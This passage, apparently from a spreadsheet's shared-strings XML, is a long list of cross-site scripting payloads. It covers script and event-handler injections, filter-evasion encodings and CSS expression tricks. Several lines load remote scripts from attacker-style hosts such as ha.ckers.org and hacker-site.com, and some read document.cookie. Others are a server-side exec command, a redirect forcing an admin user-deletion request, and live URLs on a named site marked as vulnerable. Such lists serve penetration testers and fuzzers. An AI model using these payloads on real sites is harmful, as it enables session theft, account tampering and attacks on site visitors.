    <t>&lt;A HREF="htt p://6 6.000146.0x7.147/"&gt;XSS&lt;/A&gt;</t>
  </si>
  <si>
    <t>&lt;/script&gt;&lt;img/*/src="worksinchrome&amp;colon;prompt&amp;#x28;1&amp;#x29;"/*/onerror='eval(src)'&gt;</t>
  </si>
  <si>
    <t>&gt;//\\,&lt;'&gt;"&gt;"&gt;"*"</t>
  </si>
  <si>
    <t>); alert('XSS</t>
  </si>
  <si>
    <t>&lt;script&gt;alert(1);&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;alert('XSS');&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;scr&lt;script&gt;ipt&gt;alert('XSS');&lt;/scr&lt;/script&gt;ipt&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;alert(String.fromCharCode(88,83,83))&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;img src=foo.png onerror=alert(/xssed/) /&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@im\port'\ja\vasc\ript:alert(\"XSS\")';&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;? echo('&lt;scr)'; echo('ipt&gt;alert(\"XSS\")&lt;/script&gt;'); ?&gt;</t>
  </si>
  <si>
    <t>&lt;marquee&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=\"jav&amp;#x09;ascript:alert('XSS');\"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=\"jav&amp;#x0A;ascript:alert('XSS');\"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=\"jav&amp;#x0D;ascript:alert('XSS');\"&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;script&gt;alert(0)&lt;/script&gt;&lt;script src=http://yoursite.com/your_files.js&gt;&lt;/script&gt;&lt;/title&gt;&lt;script&gt;alert(/xss/)&lt;/script&gt;&lt;/textarea&gt;&lt;script&gt;alert(/xss/)&lt;/script&gt;&lt;IMG LOWSRC=\javascript:alert('XSS')\"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG DYNSRC=\"javascript:alert('XSS')\"&gt;</t>
  </si>
  <si>
    <t>&lt;font style='color:expression(alert(document.cookie))'&gt;</t>
  </si>
  <si>
    <t>&lt;img src="javascript:alert('XSS')"&gt;</t>
  </si>
  <si>
    <t>&lt;script language="JavaScript"&gt;alert('XSS')&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;body onunload="javascript:alert('XSS');"&gt;</t>
  </si>
  <si>
    <t>&lt;body onLoad="alert('XSS');"</t>
  </si>
  <si>
    <t>[color=red' onmouseover="alert('xss')"]mouse over[/color]</t>
  </si>
  <si>
    <t>/&gt;&lt;/a&gt;&lt;/&gt;&lt;img src=1.gif onerror=alert(1)&gt;window.alert(Bonjour !");</t>
  </si>
  <si>
    <t>&lt;div style="x:expression((window.r==1)?'':eval('r=1;</t>
  </si>
  <si>
    <t>alert(String.fromCharCode(88,83,83));'))"&gt;</t>
  </si>
  <si>
    <t>&lt;iframe&lt;?php echo chr(11)?&gt; onload=alert('XSS')&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;script alert(String.fromCharCode(88,83,83))&lt;/script&gt;'&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS&lt;/h1&gt;&lt;/marquee&gt;'&gt;&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;</t>
  </si>
  <si>
    <t>"&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS&lt;/h1&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"&gt;</t>
  </si>
  <si>
    <t>&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;var var = 1; alert(var)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;?='&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;'?&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC='vbscript:msgbox(\"XSS\")'&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> onfocus=alert(document.domain) &gt; &lt;"</t>
  </si>
  <si>
    <t>&lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript:alert('XSS');\"&gt;&lt;/FRAMESET&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE&gt;li {list-style-image: url(\"javascript:alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS</t>
  </si>
  <si>
    <t>perl -e 'print \"&lt;SCR\0IPT&gt;alert(\"XSS\")&lt;/SCR\0IPT&gt;\";' &gt; out</t>
  </si>
  <si>
    <t>perl -e 'print \"&lt;IMG SRC=java\0script:alert(\"XSS\")&gt;\";' &gt; out</t>
  </si>
  <si>
    <t>&lt;br size=\"&amp;{alert('XSS')}\"&gt;</t>
  </si>
  <si>
    <t>&lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;</t>
  </si>
  <si>
    <t>&lt;/br style=a:expression(alert())&gt;</t>
  </si>
  <si>
    <t>&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(XSS")&gt;</t>
  </si>
  <si>
    <t>[color=red width=expression(alert(123))][color]</t>
  </si>
  <si>
    <t>Execute(MsgBox(chr(88)&amp;chr(83)&amp;chr(83)))&lt;</t>
  </si>
  <si>
    <t>&gt;&lt;/iframe&gt;&lt;script&gt;alert(123)&lt;/script&gt;&lt;body onLoad=while(true) alert('XSS');"&gt;</t>
  </si>
  <si>
    <t>"&gt;&lt;/title&gt;&lt;script&gt;alert(1111)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;/textarea&gt;'"&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;</t>
  </si>
  <si>
    <t>""&gt;&lt;script language="JavaScript"&gt; alert('X \nS \nS');&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;/script&gt;&lt;/script&gt;&lt;&lt;&lt;&lt;script&gt;&lt;&gt;&gt;&gt;&gt;&lt;&lt;&lt;script&gt;alert(123)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;html&gt;&lt;noalert&gt;&lt;noscript&gt;(123)&lt;/noscript&gt;&lt;script&gt;(123)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;/select&gt;&lt;script&gt;alert(123)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&gt;"&gt;&lt;script src = 'http://www.site.com/XSS.js'&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>}&lt;/style&gt;&lt;script&gt;a=eval;b=alert;a(b(/XSS/.source));&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT&gt;document.write("XSS");&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);</t>
  </si>
  <si>
    <t>&lt;script+src="&gt;"+src="http://yoursite.com/xss.js?69,69"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;body background=javascript:'"&gt;&lt;script&gt;alert(navigator.userAgent)&lt;/script&gt;&gt;&lt;/body&gt;</t>
  </si>
  <si>
    <t>&gt;/XaDoS/&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;script src=http://www.site.com/XSS.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&gt;/KinG-InFeT.NeT/&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;src=http://www.site.com/XSS.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=</t>
  </si>
  <si>
    <t>!--" /&gt;&lt;script&gt;alert('xss');&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;alert("XSS by \nxss")&lt;/script&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;script&gt;alert(XSS by \nxss")&lt;/script&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>"&gt;&lt;/title&gt;&lt;script&gt;alert("XSS by \nxss")&lt;/script&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;img """&gt;&lt;script&gt;alert("XSS by \nxss")&lt;/script&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;alert(1337)&lt;/script&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;script&gt;alert(1337)&lt;/script&gt;&gt;&lt;script&gt;alert("XSS by \nxss&lt;/h1&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>"&gt;&lt;/title&gt;&lt;script&gt;alert(1337)&lt;/script&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;iframe src="javascript:alert('XSS by \nxss');"&gt;&lt;/iframe&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt='</t>
  </si>
  <si>
    <t>&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src=" alt=</t>
  </si>
  <si>
    <t>\'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt=\'</t>
  </si>
  <si>
    <t>http://www.simpatie.ro/index.php?page=friends&amp;member=781339&amp;javafunctionname=Pageclick&amp;javapgno=2 javapgno=2 ??XSS??</t>
  </si>
  <si>
    <t>http://www.simpatie.ro/index.php?page=top_movies&amp;cat=13&amp;p=2 p=2 ??XSS??</t>
  </si>
  <si>
    <t>); alert('xss'); var x='</t>
  </si>
  <si>
    <t>\\'); alert(\'xss\');var x=\'</t>
  </si>
  <si>
    <t>//--&gt;&lt;/SCRIPT&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83));</t>
  </si>
  <si>
    <t>&gt;"&gt;&lt;ScRiPt%20%0a%0d&gt;alert(561177485777)%3B&lt;/ScRiPt&gt;</t>
  </si>
  <si>
    <t>&lt;img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"&gt;&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT SRC=http://hacker-site.com/xss.js&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT&gt; alert(“XSS”); &lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;BODY ONLOAD=alert("XSS")&gt;</t>
  </si>
  <si>
    <t>&lt;IFRAME SRC=”http://hacker-site.com/xss.html”&gt;</t>
  </si>
  <si>
    <t>&lt;TD BACKGROUND="javascript:alert('XSS')"&gt;</t>
  </si>
  <si>
    <t>&lt;OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html"&gt;</t>
  </si>
  <si>
    <t>&lt;EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always"&gt;</t>
  </si>
  <si>
    <t>&amp;apos;;alert(String.fromCharCode(88,83,83))//\&amp;apos;;alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;&amp;apos;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;apos;&amp;apos;;!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT&amp;gt;alert(&amp;apos;XSS&amp;apos;)&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;BASE HREF=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);//&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;BGSOUND SRC=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;BODY BACKGROUND=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;BODY ONLOAD=alert(&amp;apos;XSS&amp;apos;)&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;DIV STYLE=&amp;quot;background-image: url(javascript:alert(&amp;apos;XSS&amp;apos;))&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;DIV STYLE=&amp;quot;background-image: url(&amp;amp;#1;javascript:alert(&amp;apos;XSS&amp;apos;))&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;DIV STYLE=&amp;quot;width: expression(alert(&amp;apos;XSS&amp;apos;));&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;&amp;lt;/FRAMESET&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IFRAME SRC=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;&amp;lt;/IFRAME&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;INPUT TYPE=&amp;quot;IMAGE&amp;quot; SRC=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=javascript:alert(&amp;apos;XSS&amp;apos;)&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG DYNSRC=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG LOWSRC=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=&amp;quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;amp;deleteuser</t>
  </si>
  <si>
    <t>exp/*&amp;lt;XSS STYLE=&amp;apos;no\xss:noxss(&amp;quot;*//*&amp;quot;);</t>
  </si>
  <si>
    <t>&amp;lt;STYLE&amp;gt;li {list-style-image: url(&amp;quot;javascript:alert(&amp;#39;XSS&amp;#39;)&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=&amp;apos;vbscript:msgbox(&amp;quot;XSS&amp;quot;)&amp;apos;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;LAYER SRC=&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;gt;&amp;lt;/LAYER&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=&amp;quot;livescript:[code]&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>%BCscript%BEalert(%A2XSS%A2)%BC/script%BE</t>
  </si>
  <si>
    <t>&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0; URL=http://;URL=javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=&amp;quot;mocha:[code]&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;OBJECT TYPE=&amp;quot;text/x-scriptlet&amp;quot; DATA=&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;gt;&amp;lt;/OBJECT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript:alert(&amp;apos;XSS&amp;apos;)&amp;gt;&amp;lt;/OBJECT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;EMBED SRC=&amp;quot;http://ha.ckers.org/xss.swf&amp;quot; AllowScriptAccess=&amp;quot;always&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;</t>
  </si>
  <si>
    <t>a=&amp;quot;get&amp;quot;;&amp;amp;#10;b=&amp;quot;URL(&amp;quot;&amp;quot;;&amp;amp;#10;c=&amp;quot;javascript:&amp;quot;;&amp;amp;#10;d=&amp;quot;alert(&amp;apos;XSS&amp;apos;);&amp;quot;)&amp;quot;;&amp;#10;eval(a+b+c+d);</t>
  </si>
  <si>
    <t>&amp;lt;STYLE TYPE=&amp;quot;text/javascript&amp;quot;&amp;gt;alert(&amp;apos;XSS&amp;apos;);&amp;lt;/STYLE&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG STYLE=&amp;quot;xss:expr/*XSS*/ession(alert(&amp;apos;XSS&amp;apos;))&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;XSS STYLE=&amp;quot;xss:expression(alert(&amp;apos;XSS&amp;apos;))&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;STYLE&amp;gt;.XSS{background-image:url(&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;)&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;STYLE type=&amp;quot;text/css&amp;quot;&amp;gt;BODY{background:url(&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;)&amp;quot;)}&amp;lt;/STYLE&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;STYLE&amp;gt;@import&amp;apos;http://ha.ckers.org/xss.css&amp;apos;;&amp;lt;/STYLE&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;META HTTP-EQUIV=&amp;quot;Link&amp;quot; Content=&amp;quot;&amp;lt;http://ha.ckers.org/xss.css&amp;gt;; REL=stylesheet&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;STYLE&amp;gt;BODY{-moz-binding:url(&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;)}&amp;lt;/STYLE&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;TABLE BACKGROUND=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;)&amp;quot;&amp;gt;&amp;lt;/TABLE&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;)&amp;quot;&amp;gt;&amp;lt;/TD&amp;gt;&amp;lt;/TABLE&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;HTML xmlns:xss&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;![CDATA[&amp;lt;IMG SRC=&amp;quot;javas]]&amp;gt;&amp;lt;![CDATA[cript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;]]&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;XML ID=&amp;quot;xss&amp;quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;lt;IMG SRC=&amp;quot;javas&amp;lt;!-- --&amp;gt;cript:alert(&amp;apos;XSS&amp;apos;)&amp;quot;&amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;XML SRC=&amp;quot;http://ha.ckers.org/xsstest.xml&amp;quot; ID=I&amp;gt;&amp;lt;/XML&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;!--[if gte IE 4]&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;META HTTP-EQUIV=&amp;quot;Set-Cookie&amp;quot; Content=&amp;quot;USERID=&amp;lt;SCRIPT&amp;gt;alert(&amp;apos;XSS&amp;apos;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;XSS STYLE=&amp;quot;behavior: url(http://ha.ckers.org/xss.htc);&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT SRC=&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;!--#exec cmd=&amp;quot;/bin/echo &amp;apos;&amp;lt;SCRIPT SRC&amp;apos;&amp;quot;--&amp;gt;&amp;lt;!--#exec cmd=&amp;quot;/bin/echo &amp;apos;=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;apos;&amp;quot;--&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;? echo(&amp;apos;&amp;lt;SCR)&amp;apos;;</t>
  </si>
  <si>
    <t>&amp;lt;BR SIZE=&amp;quot;&amp;amp;{alert(&amp;apos;XSS&amp;apos;)}&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=JaVaScRiPt:alert(&amp;apos;XSS&amp;apos;)&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=javascript:alert(&amp;amp;quot;XSS&amp;amp;quot;)&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=`javascript:alert(&amp;quot;RSnake says, &amp;apos;XSS&amp;apos;&amp;quot;)`&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;DIV STYLE=&amp;quot;background-image:\0075\0072\006C\0028&amp;apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&amp;apos;\0029&amp;quot;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;</t>
